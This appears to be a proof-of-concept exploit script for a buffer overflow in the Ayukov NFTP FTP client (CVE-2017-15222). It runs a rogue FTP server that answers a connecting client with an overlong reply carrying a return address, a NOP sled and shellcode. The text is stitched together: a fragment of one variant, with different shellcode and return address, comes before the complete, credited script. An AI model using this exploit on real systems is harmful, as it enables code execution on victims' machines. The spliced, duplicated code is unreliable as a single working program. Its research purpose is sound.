buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05"
buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe"
buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba"
buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15"
buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3"
buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32"
buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4"
buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b"
buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7"
buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72"
buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd"
buf += "\xa4\x03\x5f\xc4"
evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 + buf + "D"*10425
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + '\r\n')
print conn.recv(1024)
conn.send('331 OK.\r\n')
print conn.recv(1024)
conn.send('230 OK.\r\n')
print conn.recv(1024)
conn.send(evil + '\r\n')
print conn.recv(1024)
conn.send('257' + '\r\n')
#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
####################################
# Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow
# Date: 2017-10-21
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://ayukov.com/nftp/source-release.html
# Software Link: ftp://ftp.ayukov.com/pub/nftp/
# Version: v1.71, v1.72, v1.8, v2.0
# Tested on: Windows 10
# Category: Windows Remote Exploit
# CVE : CVE-2017-15222
import socket
IP = '127.0.0.1'
port = 21
#(exec calc.exe)
shellcode=(
"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5"
"\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b"
"\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd"
"\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb"
"\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08"
"\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64"
"\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33"
"\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5"
"\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b"
"\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98"
"\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43"
"\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53"
"\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f"
"\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea"
"\x51\x58")
CALL_ESP = "\xdd\xfc\x40\x00" # call esp - nftpc.exe #0040FCDD
buff = "A" * 4116 + CALL_ESP + '\x90' * 16 + shellcode + "C" * (15000-4116-4-16-len(shellcode))
#Can call esp but the null byte terminates the string.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + '\r\n')
print conn.recv(1024)
conn.send('331 OK.\r\n')
print conn.recv(1024)
conn.send('230 OK.\r\n')
print conn.recv(1024)
conn.send(buff + '\r\n')
print conn.recv(1024)
conn.send('257' + '\r\n')